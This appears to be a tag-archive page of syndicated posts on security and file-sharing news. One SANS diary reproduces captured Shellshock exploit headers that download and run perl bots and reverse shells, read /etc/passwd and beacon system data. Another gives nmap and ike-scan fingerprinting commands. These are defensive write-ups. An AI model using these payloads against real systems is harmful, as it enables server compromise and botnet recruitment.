Posts tagged ‘ip address’

SANS Internet Storm Center, InfoCON: yellow: Shellshock: A Collection of Exploits seen in the wild, (Mon, Sep 29th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far:

1 – Simple “vulnerability checks” that used custom User-Agents:

() { 0v3r1d3;};echo x22Content-type: text/plainx22; echo; uname -a;
() { :;}; echo ‘Shellshock: Vulnerable’
() { :;};echo content-type:text/plain;echo;echo [random string];echo;exit
() { :;}; /bin/bash -c “echo testing[number]“; /bin/uname -ax0ax0a
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 x22() { test;};echo x5Cx22Co
ntent-type: text/plainx5Cx22; echo; echo; /bin/cat /etc/passwdx22 http://[IP address]/cgi-bin/test.cgi

This one is a bit different. It includes the tested URL as user agent. But of course, it doesn’t escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an “empty page” message.

) { :;}; /bin/bash -c x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139×22

 

2 – Bots using the shellshock vulnerability:

This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug

() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b
0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0
b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http
://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;” “() { :; }; x22exec(‘/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/sh
ock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.
com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; curl -O http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt ; lwp-download http:
//xr0b0tx.com/shock/xrt ; perl /tmp/xrt ;rm -rf /tmp/xrt ; wget http://xr0b0tx.com/shock/xrt ; perl /tmp/xrt ; rm -rf /tmp/xrt’)x22;

3 – Vulnerability checks using multiple headers:

GET / HTTP/1.0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: */*
Cookie: () { :; }; ping -c 3 [ipaddress]
Host: () { :; }; ping -c 3 [ipaddress]
Referer: () { :; }; ping -c 3 [ipaddress]

4 – Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case)

GET / HTTP/1.1
Host: [ip address]
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awardspace.com/auth; /usr/bin/perl /tmp/auth.pl

5 – Using User-Agent to report system parameters back (the IP address is currently not responding)

GET / HTTP/1.0
Accept: */*
aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3
Host: () { :; }; wget -qO- 82.221.99.235 -U=”$(uname -a)”
Cookie: () { :; }; wget -qO- 82.221.99.235 -U=”$(uname -a)” 

6 – User-Agent used to install perl box

GET / HTTP/1.0
Host: [ip address]
User-Agent: () { :;}; /bin/bash -c “wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*

 

 


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Gottfrid Svartholm Trial: IT Experts Give Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice continued this week in Copenhagen, Denmark. While Gottfrid is well known as a founder of The Pirate Bay, his co-defendant’s identity is still being kept out of the media.

In what’s being described as the largest case of its kind ever seen in the Scandinavian country, both stand accused of hacking computer mainframes operated by US IT giant CSC. This week various IT experts have been taking the stand.

On Tuesday, IT investigator Flemming Grønnemose appeared for the third time and stated that during the summer and fall of 2012, Swedish police had tipped off Danish police about possible hacker attacks against CSC.

According to DR.dk, as part of Grønnemose’s questioning Gottfrid’s lawyer Luise Høj raised concerns over a number of changes that had taken place on her client’s computer since it had been taken into police custody.

Grønnemose admitted that when police installed programs of their own onto the device, security holes which could have been exploited for remote control access could have been closed. However, it appears police also have an exact copy of the machine in an unmodified state.

Further evidence centered around the IP addresses that were traced during the attacks. IP addresses from several countries were utilized by the attackers including those in Cambodia, Germany, Iran, Spain and the United States. German police apparently investigated the local IP address and found that it belonged to a hacked server in a hosting facility.

The server had not been rented out for long, but was still on and had been taken over by hackers, Grønnemose said. According to the prosecution, the same server also featured in last year’s Logica case in Sweden. Gottfrid was found guilty in that case and sentenced to two years in jail.

Another IT expert called to give evidence on the same day was Allan Lund Hansen who had examined the files found on Gottfrid’s computer. Those files, garnered from the CSC hack, contained thousands of names, addresses and social security numbers of Danish citizens. Since the files were in an encrypted folder along with data from earlier attacks on IT company Logica and the Nordea bank, the prosecution are linking the files to Gottfrid.

On Thursday, DR.dk reported that the debate over Gottfrid’s computer being remotely controlled continued. Previously Jacob Appelbaum argued that an outside attacker could have used the machine to carry out the attacks but defense experts from the Center for Cyber ​​Security disputed that.

This week Thomas Krismar from the Center said that Python scripts found on Gottfrid’s computer were able to carry out automated tasks but in this case remote control was unlikely to be one of them.

“There are two characteristics we always look for when we try to discover remote control features. The first is one that starts automatically when you turn on your computer since the attacker will always try to maintain their footing on the computer. The second is one that ‘phones home’ to indicate that it is ready to receive commands,” Krismar said.

The script in question on Gottfrid’s machine needed to be started manually and did not attempt to make contact with anything on the web, the expert said.

Also appearing Thursday were further witnesses including Joachim Persson of Stockholm police who investigated Gottfrid’s computers after his arrest in Cambodia.

Persson said he found a tool known as Hercules, a sophisticated piece of software that emulates the kind of systems that were hacked at CSC. Persson did note, however, that such tools have legitimate uses for those learning how to operate similar systems.

The trial continues.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Works Like a Charm

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As a software developer, one of my core philosophies is to automate common tasks. If you have to do something more than once, then it is better to automate it.

Of course, there always is that trade-off between the time to automate and the time saved. If a two-minute task takes 20 hours to automate, then it’s probably faster (and a better use of your time) to do it manually when needed. However, if you need to do it hundreds of times, then it’s better to spend 20 hours automating it.

Sometimes you may not even realize how often you do a task. All of those minutes may not seem like much, but they can really add up.

Work Harder, Not Smarter

FotoForensics is currently receiving over 1,000 unique pictures per day. We’re at the point where we can either (A) hire more administrators, or (B) simplify existing administrative duties.

Recently I’ve been taking a closer look at some of the tasks we manually perform. Things like categorizing content for various research projects, identifying trends, scanning content for “new” features that run the gambit from new devices to new attacks, reviewing flagged content, and responding to user requests. A lot of these tasks are time consuming and performed more than once. And a few of them can be automated.

Blacklists
Network abuses come in many different forms. Users may upload prohibited content, automate submissions, attack the site with port scans and vulnerability tests, or submit comment-spam to our contact form. It’s always a good idea to check abusers against known blacklists. This tells me whether it is a wide-spread abuse or if my site is just special.

There are a bunch of servers that run DNS-based blacklists. They all work in similar ways:

  1. You encode the query as a hostname. Like “2.1.9.127.dnsbl.whatever”. This encodes the IP address in reverse-notation: 127.9.1.2.
  2. You perform a DNS hostname lookup.
  3. The DNS result encodes the response as an IP address. Different DNSBL servers have different encoded values, but they typically report suspicious behavior, known proxies, and spammer.

Some DNSBL servers seem too focused for my use. For example, if they only report known-spam systems and not proxies or malware, then it will rarely find a match for my non-spam queries. Other DNSBL systems seem to have dated content, with lists of proxies that have not been active for years. (One system will quickly add proxies but won’t remove them without a request. So dead proxies remain listed indefinitely.)

Most DNSBL servers focus on anti-spam. They report whether the address was used to send spam, harvest addresses, or other related actions. Ideally, I’d like a DNSBL that focuses on other hostile activities: network scanners, attackers, and proxies. But for now, looking for other abuses, like harvesters and comment-spam, is good enough.

Anonymous Proxies
I believe that anonymous proxies are important. They permit whistle-blowers to make anonymous reports and allow people to discuss personal issues without the fear of direct retribution. Groups like “Alcoholics Anonymous” would not be as successful if members had to be fully outed.

Unfortunately, anonymity also permits abuses. The new automated system downloads the list of TOR nodes daily. This allows us to easily check if a ban is tied to a TOR node. We don’t ban every TOR node. Instead, we only ban the nodes used for uploading prohibited content to the site.

For beginner TOR users, this may not make sense. Banning one node won’t stop the problem since the user will just change nodes. Except… Not all TOR nodes are equal. Nodes that can handle a higher load are given a higher weight and are more likely to carry traffic. We’ve only banned about 300 of the 6,100 TOR nodes, but that seems to have stopped most abuses from TOR. (And best yet: only about a dozen of these bans were manually performed — most were caught by our auto-ban system.)

Automating History
The newly automated system also scans the logs for own ban records and any actions made after being banned. I can tell if the network address is associated with network attacks or if the user just uploaded prohibited content. I can also tell if the user attempted to avoid the ban.

I recently had one person request a ban-removal. He claimed that he didn’t know why he was banned. After looking at the automated history report, I decided to leave the ban in place and not respond to him. But I was very tempted to write something like: “Dude… You were banned three seconds after you uploaded that picture. You saw the ban message that said to read the FAQ, and you read it twelve seconds later. Then you reloaded eight times, switched browsers, switched computers, and then tried to avoid the ban by changing your network address. And now you’re claiming that you don’t know why you were banned? Yeah, you’re still banned.”

Performing a full history search though the logs for information related to a ban used to take minutes. Now it takes one click.

NCMEC Reports
The word forensics means “relating to the use of scientific knowledge or methods in solving crimes” or “relating to, used in, or suitable to a court of law”. When you see a forensic system, you know it is geared toward crime detection and legal issues.

And people who deal in child exploitation photos know that their photos are illegal. Yet, some people are stupid enough to upload illegal pictures to FotoForensics.

The laws regarding these pictures are very explicit: we must report pictures related to child abuse and exploitation to the CyberTipline at the National Center for Missing and Exploited Children (NCMEC).

While I don’t mind the reporting requirement, I don’t like the report form. The current online form has dozens of fields and takes me more than 6 minutes to complete each time I need to submit a report. I need to gather the picture(s), information about the submitter, and other related log information. Some reports have a lot of files to attach, so they can take 12 minutes or more to complete. The total time I’ve spent using this form in the last year can be measured in days.

I’ve finally had enough of the manual submission process. I just spent a few days automating it from my side. It’s a PHP script that automatically logs in (for the session tokens), grabs the form (for the fields and any pre-populated values), fills out the data, attaches files, and submits it. It also automatically writes a short report (that I can edit with more information), records the confirmation information, and archives the stuff I am legally required to retain.

Instead of taking me 6+ minutes for each report, it now takes about 3 seconds. This simplifies the entire reporting process and significantly reduces the ick-factor.

Will Work for Work

A week of programming effort (spread over three weeks) has allowed me to reduce the overhead. Administrative tasks that would take a few hours each day now take minutes.

There’s still a good number of tasks that can be automated. This includes spotting certain types of pictures that are currently being included in specific research projects, and some automated classification. I can probably add in a little more automated NCMEC reporting, for those common cases where there is no need for a manually confirmation.

Eventually I will need to get a more powerful server and maybe bring on more help. But for right now, simply automating common tasks makes the current server very manageable.

SANS Internet Storm Center, InfoCON: green: Strange ICMP traffic seen in destination, (Sat, Sep 20th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Reader Ronnie provided us today a packet capture with a very interesting situation:

  1. Several packets are arriving, all ICMP echo request from unrelated address:
    ICMP sources
  2. All ICMP packets being sent to the destination address does not have data, leaving the packet with the 20 bytes for the IP header and 8 bytes for the ICMP echo request without data
    ICMP data
  3. All the unrelated address sent 6 packets: One with normal TTL and 5 with incremental TTL:
    6 ICMP packets for each destination

Seems to be those packets are trying to map a route, but in a very particular way. Since there are many unrelated IP addresses trying to do the same, maybe something is trying to map routes to specific address to do something not good. The destination IP address is an ADSL client.

Is anyone else seeing these kind of packets? If you do, we definitely want to hear from you. Let us know!

Manuel Humberto Santander Peláez
SANS Internet Storm Center – Handler
Twitter:@manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Expendables 3 Downloaders Told To Pay Up – Or Else

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Back in July a pretty much pristine copy of The Expendables 3 leaked online. It was a dramatic event for those behind the production as the movie’s premier on BitTorrent networks trumped its theatrical debut by several weeks.

Distributor Lionsgate was quick to react. Just days after the leak the entertainment company sued several file-sharing sites, which eventually resulted in the closure of file-hosting site Hulkfile. But more action was yet to come.

Doubling up on their efforts, Lionsgate also targeted hosting providers, domain registrars and seedboxes while at the same time sending thousands of DMCA takedown notices to have content and links to content removed.

However, a big question remained unanswered. Would the makers of The Expendables 3 start tracking down alleged file-sharers to force them into cash settlements as happened with previous iterations of the movie? It’s taken a few weeks but confirmation is now in.

Millennium Films, the production company behind The Expendables 3, is now shaking down individual Internet users they believe to have downloaded and shared the leaked movie without permission. What do they want? Hard cash, of course.

Interestingly, and at least for now, the company isn’t going through the courts filing subpoenas against ISPs to obtain downloaders’ personal details. In a switch of tactics the company is sending DMCA takedown notices to ISPs via CEG TEK International and requesting that the notices are forwarded to the customers in question instead. In addition to the usual cease and desist terminology, Millennium tag on cash settlements demands too.

Expendables 3-notice

As can be seen in the image above, the production company is giving notice recipients until October 5, 2014 to come up with the money – or else.

“If within the prescribed time period described above you fail to (i) respond or settle, or (ii) provide by email to support@cegtek.com written evidence of your having consent or permission from Millennium Films to use the Work in connection with Peer-to-Peer networks (note that fraudulent submissions may give rise to additional liabilities), the above matter may be referred to attorneys representing the Work’s owner for legal action,” the settlement offer reads.

Of course, whether people fill in CEG TEK’s settlement form or write to them with their personal details, the end result will be the same. The company will now have the person’s identity, something they didn’t previously have since at this stage ISPs have only forwarded the notices.

While the notices are real (CEG TEK have confirmed the action) little is known about how much money Millenium/CEG TEK are demanding to make a supposed lawsuit go away. However, TorrentFreak has learned that CEG TEK are simultaneously sending out settlement demands to alleged downloaders of The Expendables 2. A copy of the settlement page demand – $300 – is shown below.

expend2-demand

While some people will no doubt be worrying about how to deal with these demands and whether Millenium will follow through on its implied threat to sue, at least some of these notices will be falling on deaf ears. LiquidVPN, an anonymity company listed in our 2014 report, received one such notice but as a no-log provider, could not forward it to its customer.

Compare that to the despair of a user posting on KickassTorrents who got caught after relying on IP address blocking software (typos etc corrected).

“I woke up to this alongside four other notices from my ISP. I stopped downloading six days ago, but I’m receiving old notices about movies that were downloaded a month ago and I basically can’t do nothing about it since its old. I use PeerBlock and it’s a bunch of bullshit. What should I do with this October 5 deadline on a settlement? Please help!” he wrote.

Finally, and as Lionsgate, Millennium Films and CEG TEK shake down sites, hosting services, domain registrars, seedbox providers and now end users, the big mystery surrounding the most important questions remain unanswered.

Who – at Lionsgate, Millennium or one of its partners – had full access to a clean DVD copy of the movie? Who then put that copy in a position of being placed online? The FBI, who can crack the most complex of terrorist crimes, are reportedly involved and must’ve asked these questions. Yet the culprit still hasn’t been found……

Could it be that studios become less cooperative when blame falls too close to home?

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Dread Pirate Sunk By Leaky CAPTCHA

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Ever since October 2013, when the FBI took down the online black market and drug bazaar known as the Silk Road, privacy activists and security experts have traded conspiracy theories about how the U.S. government managed to discover the geographic location of the Silk Road Web servers. Those systems were supposed to be obscured behind the anonymity service Tor, but as court documents released Friday explain, that wasn’t entirely true: Turns out, the login page for the Silk Road employed an anti-abuse CAPTCHA service that pulled content from the open Internet, thus leaking the site’s true location.

leakyshipTor helps users disguise their identity by bouncing their traffic between different Tor servers, and by encrypting that traffic at every hop along the way. The Silk Road, like many sites that host illicit activity, relied on a feature of Tor known as “hidden services.” This feature allows anyone to offer a Web server without revealing the true Internet address to the site’s users.

That is, if you do it correctly, which involves making sure you aren’t mixing content from the regular open Internet into the fabric of a site protected by Tor. But according to federal investigators,  Ross W. Ulbricht — a.k.a. the “Dread Pirate Roberts” and the 30-year-old arrested last year and charged with running the Silk Road — made this exact mistake.

As explained in the Tor how-to, in order for the Internet address of a computer to be fully hidden on Tor, the applications running on the computer must be properly configured for that purpose. Otherwise, the computer’s true Internet address may “leak” through the traffic sent from the computer.

howtorworks

And this is how the feds say they located the Silk Road servers:

“The IP address leak we discovered came from the Silk Road user login interface. Upon examining the individual packets of data being sent back from the website, we noticed that the headers of some of the packets reflected a certain IP address not associated with any known Tor node as the source of the packets. This IP address (the “Subject IP Address”) was the only non-Tor source IP address reflected in the traffic we examined.”

“The Subject IP Address caught our attention because, if a hidden service is properly configured to work on Tor, the source IP address of traffic sent from the hidden service should appear as the IP address of a Tor node, as opposed to the true IP address of the hidden service, which Tor is designed to conceal. When I typed the Subject IP Address into an ordinary (non-Tor) web browser, a part of the Silk Road login screen (the CAPTCHA prompt) appeared. Based on my training and experience, this indicated that the Subject IP Address was the IP address of the SR Server, and that it was ‘leaking’ from the SR Server because the computer code underlying the login interface was not properly configured at the time to work on Tor.”

For many Tor fans and advocates, The Dread Pirate Roberts’ goof will no doubt be labeled a noob mistake — and perhaps it was. But as I’ve said time and again, staying anonymous online is hard work, even for those of us who are relatively experienced at it. It’s so difficult, in fact, that even hardened cybercrooks eventually slip up in important and often fateful ways (that is, if someone or something was around at the time to keep a record of it).

A copy of the government’s declaration on how it located the Silk Road servers is here (PDF). A hat tip to Nicholas Weaver for the heads up about this filing.

A snapshop of offerings on the Silk Road.

A snapshop of offerings on the Silk Road.

SANS Internet Storm Center, InfoCON: green: Identifying Firewalls from the Outside-In. Or, “There’s Gold in them thar UDP ports!”, (Thu, Sep 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

In a penetration test, often the key to bypassing a security control is as simple as knowing identifying the platform it’s implemented on.  In other words, it’s a lot easier to get past something if you know what it is.  For instance, quite often you’ll be probing a set of perimeter addresses, and if there are no vulnerable hosts NAT-ed out for you, you might start feeling like you’re at a dead end.   Knowing what those hosts are would be really helpful right about now.  So, what to do next?

Look at UDP, that’s what.  Quite often scanning the entire UDP range will simply burn hours or days with not a lot to show for it, but if you target your scans carefully, you can quite often get some good information in a hurry.

Scanning NTP is a great start.  Way too many folks don’t realize that when you make a network device (a router or switch for instance) an NTP client, quite often you also make it an NTP server as well, and NTP servers love to tell you all about themselves.  All too often that port is left open because nobody knows to block it.  

Another service that quite often bypasses all firewall ACLs is the corporate remote access IPSEC VPN specifically IKE/ISAKMP (udp/500).  Even if this is a branch firewall with a site-to-site VPN to head office, often IKE is misconfigured to bypass the interface ACL, or the VPN to head office is enabled with a blanket “any any” permit for IKE.

Let’s take a look at these two sevices – we’ll let’s use NMAP to dig a little deeper.  First, let’s scan for those ports:

nmap -Pn -sU -p123,500 –open x.x.x.x
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-29 12:13 Eastern Daylight Time

Nmap scan report for some.fqdn.name (x.x.x.x)
Host is up (0.070s latency).
PORT    STATE SERVICE
123/udp open  ntp
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 46.69 seconds

OK, so we found open UDP ports – how does this help us?  Let’s run the SECOND set of scans against these two ports, starting with expanding the NMAP scan to use the ntp-info script:

C: > nmap -Pn -sU -p123 –open x.x.x.x –script=ntp-info.nse

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-29 12:37 Eastern Daylight Time

Nmap scan report for some.fqdn.name (x.x.x.x)
Host is up (0.042s latency).
PORT    STATE SERVICE
123/udp open  ntp
| ntp-info:
|   receive time stamp: 2014-08-29T16:38:51
|   version: 4
|   processor: unknown
|   system: UNIX
|   leap: 0
|   stratum: 4
|   precision: -27
|   rootdelay: 43.767
|   rootdispersion: 135.150
|   peer: 37146
|   refid: 172.16.10.1
|   reftime: 0xD7AB23A5.12F4E3CA
|   poll: 10
|   clock: 0xD7AB2B15.EA066B43
|   state: 4
|   offset: 11.828
|   frequency: 53.070
|   jitter: 1.207
|   noise: 6.862
|_  stability: 0.244

Nmap done: 1 IP address (1 host up) scanned in 48.91 seconds

Oops – ntp-info not only tells more about our host, it also discloses the NTP server that it’s syncing to – in this case check that host IP in red – that’s an internal host.  In my books, that can be rephrased as “the next target host”, or maybe if not next, at least on the list “for later”.  Interestingly, support for ntp-info requests positions this host nicely to act as an NTP reflector/amplifier, which can then be used in DDOS spoofing attacks.  The send/receive ration is just under 1:7 (54 bytes sent, 370 received), so not great, but that’s still a 7x amplification which you can spoof.

Back to the pentest – ntp-info gives us some good info, it doesn’t specifically tell us what OS our target host is running, so let’s take a look at IKE next, with service detection enabled:

C: > nmap -Pn -sU -p500 -sV –open x.x.x.x

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-29 13:10 Eastern Daylight Time

Nmap scan report for some.fqdn.name (x.x.x.x)
Host is up (0.010s latency).
PORT    STATE SERVICE
500/udp open  isakmp
Service Info: OS: IOS 12.3/12.4; CPE: cpe:/o:cisco:ios:12.3-12.4

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.05 seconds

Ah – very nice!  Nmap correctly tells us that this device is a Cisco Router (not an ASA or any other device)

The ike-scan utility should give us some additional IKE info, let’s try that with a few different options:

A basic verbose assess (main mode) gives us nothing:

C: > ike-scan -v x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d68fbcc7d)

Ending ike-scan 1.9: 1 hosts scanned in 0.041 seconds (24.39 hosts/sec).  0 returned handshake; 1 returned notify

Ditto, main mode IKEv2:

C: > ike-scan -v -2 x.x.x.x
DEBUG: pkt len=296 bytes, bandwidth=56000 bps, int=46285 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
—     Pass 1 of 3 completed
—     Pass 2 of 3 completed
—     Pass 3 of 3 completed

Ending ike-scan 1.9: 1 hosts scanned in 2.432 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify

with just nat-t, still nothing:

C: > ike-scan -v -nat-t x.x.x.x
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x    Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=ea1b111d8198ef48)

Ending ike-scan 1.9: 1 hosts scanned in 0.038 seconds (26.32 hosts/sec).  0 returned handshake; 1 returned notify

Aggressive mode however is a winner-winnner-chicken-dinner!

C: > ike-scan -v -A x.x.x.x
DEBUG: pkt len=356 bytes, bandwidth=56000 bps, int=54857 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
x.x.x.x    Aggressive Mode Handshake returned HDR=(CKY-R=ea1b111d4f1622a2)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=2
8800) VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity) VID=afcad71368a1f1c96b8
696fc77570100 (Dead Peer Detection v1.0) VID=1fdcb6004f1722a231f9e4f59b27b857 VI
D=09002689dfd6b712 (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=x.x.x.x) Nonce(20 bytes) Hash(20 bytes)

Ending ike-scan 1.9: 1 hosts scanned in 0.068 seconds (14.71 hosts/sec).  1 returned handshake; 0 returned notify

We see from this that the remote office router (this is what this device is)  is configured for aggressive mode and XAUTH – so in other words, there’s likely a userid and password along with the preshared key to authenticate the tunnel.  Note that ike-scan identifies this host as “Cisco unity”, so while it gives us some new information, for basic device identification, in this case NMAP gave us better info.

What should you do to prevent scans like this and the exploits based on them?  The ACL on your perimeter interface might currently end with a “deny tcp any any log” – consider adding on “deny udp any any log”, or better yet, replace it with “deny ip any any log”.  Permit *exactly* what you need, deny everything else, and just as important – LOG everything that gets denied.  Logging most of what is permitted also is also a good idea – if you’ve ever had to troubleshoot a problem or backtrack a security incident without logs, you are likely already doing this.

Adding a few honeypots into the mix is also a nice touch.  Denying ICMP will often defeat scripts or cursory scans.  Many network devices can be configured to detect scans and “shun” the scanning host – test this first though, you don’t want to block production traffic by accident with an active control like this.

Have you found something neat in what most might otherwise consider a common and relatively “secure” protocol?  Please, use our diary to share your story !

===============
Rob VandenBrink
Metafore

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Raspberry Pi: Ben’s Mega USA Tour

This post was syndicated from: Raspberry Pi and was written by: Ben Nuttall. Original post: at Raspberry Pi

Last month we put out a blog post advertising that I would be doing a tour of America, with a rough initial route, and we welcomed requests for visits.

usa-final

Over the next couple of weeks I was overwhelmed with visit requests – I plotted all the locations on a map and created a route aiming to reach as many as possible. This meant covering some distance in the South East before heading back up to follow the route west towards Utah. I prepared a set of slides based on my EuroPython talk, and evolved the deck each day according to the reception, as well as making alterations for the type of audience.

With launching the Education Fund, being in Berlin for a week for EuroPython followed by YRS week and a weekend in Plymouth, I’d barely had time to plan the logistics of the trip – much to the annoyance of our office manager Emma, who had to book me a one-way hire car with very specific pick-up and drop-off locations (trickier than you’d think), and an internal flight back from Salt Lake City. I packed a suitcase of t-shirts for me to wear (wardrobe by Pimoroni) and another suitcase full of 40 brand new Raspberry Pis (B+, naturally) to give away. As I departed for the airport, Emma and Dave stuck a huge Raspberry Pi sticker on my suitcase.

IMG_20140804_095615

When checking in my suitcase the woman on the desk asked what the Raspberry was, and her colleague explained it to her! In the airport I signed in to the free wifi with one of my aliases, Edward Snowden. I started to think Phil McKracken or Mr. Spock might have been a better choice once I spotted a few security guards seemingly crowding around in my proximity…

Mon 4 – NYC, New York

I managed to board the flight without a federal investigation (although I may now be on the list, if I wasn’t already), and got chatting to the 60 year old Texan lady I was seated with, who hadn’t heard about Raspberry Pi until she managed to land a seat next to me for 8 hours. I had her convinced before we left the ground. I don’t know how he does it, but Richard Branson makes 8 hours on a tin can in the sky feel like heaven. Virgin Atlantic is great!

Upon landing at JFK I was subjected to two hours’ queuing (it was nice of them to welcome us with traditional British pastimes), followed by a half-hour wait to get through customs. I felt I ought to declare that I was bringing forty computers in to the country (also stating they were to be given away), and was asked to explain what they were, show one to the officer who took hold of one of the copies of Carrie Anne‘s book, Adventures in Raspberry Pi, to validate my explanation. Fortunately I was not required to participate in a pop quiz on Python indentation, GPIO, Turtle graphics and Minecraft, as he took my word for it and let me through. I was then given the chance to queue yet again – this time about 45 minutes for a taxi to Manhattan. I arrived at Sam‘s house much later than I’d anticipated much she was there to greet me by hanging her head out the window and shouting “MORNING BEN”. An in-joke from a time we both lived in Manchester.

We ate and met my friend-from-the-internet Aidan, we went to a bar until what was 5am on my body clock. A sensible approach, I thought, was to just stay up and then get up at a normal time the next day. I awoke and saw the time was 6.00 – my jetlagged and exhausted mind decided it was more likely to be 6pm than 6am, but it was wrong. I arose and confirmed a meeting time and place for my first visit – just a few blocks away from Sam’s apartment in Manhattan.

Tue 5 – NYC, New York

I met Cameron and Jason who had set up a summer class teaching a computing course for locals aged 18-and-under for 2 weeks, delivered purely on Raspberry Pis! I chatted with them before the students arrived, and they told me about how they set up the non-profit organisation STEMLadder, and that they were letting the students take the Pis home at the end of the course. Today’s class was on using Python with Minecraft – using some material they found online, including a resource I helped put together with Carrie Anne for our resources section.

I gave an introduction about the Raspberry Pi Foundation and showed some example projects and then the kids did the Python exercises while working on their own “side projects” (building cool stuff while the course leaders weren’t looking)!

IMG_20140805_155705

Thanks to Cameron and Jason for taking the opportunity to provide a free course for young people. A perfect example use for Raspberry Pi!

Wed 6 – Washington, DC

On Wednesday morning I collected my hire car (a mighty Nissan Altima) and set off for Washington, DC! I’ve only been driving for less than a year so getting in a big American car and the prospect of using the streets of Manhattan to warm up seemed rather daunting to me! I had a GPS device which alleviated some of my concern – and I headed South (yes, on the wrong right side of the road).

IMG_20140806_104224

I’d arranged to meet Jackie at 18F – a digital services agency project in the US government General Services Administration. This came about when I met Matt from Twilio at EuroPython, who’d done a similar tour (over 5 months). After a 6 hour drive including horrendous traffic around Washington (during which I spotted a sign saying “NSA – next right – exployees only“, making me chuckle), I arrived and entered 18F’s HQ (at 1800 F Street) where I had to go through security as it was an official government building. I was warned by Jackie by email that the people I’d be meeting would be wearing suits but I need not worry and wear what I pleased – so I proudly wore shorts and a green Raspberry Pi t-shirt. I met with some of the team and discussed some of their work. 18F was set up to replicate some of the recent initiatives of the UK government, such as open data, open source projects and use of GitHub for transparency. They also work on projects dealing with emergency situations, such as use of smartphones to direct people to sources of aid during a disaster, and using Raspberry Pis to provide an emergency communication system.

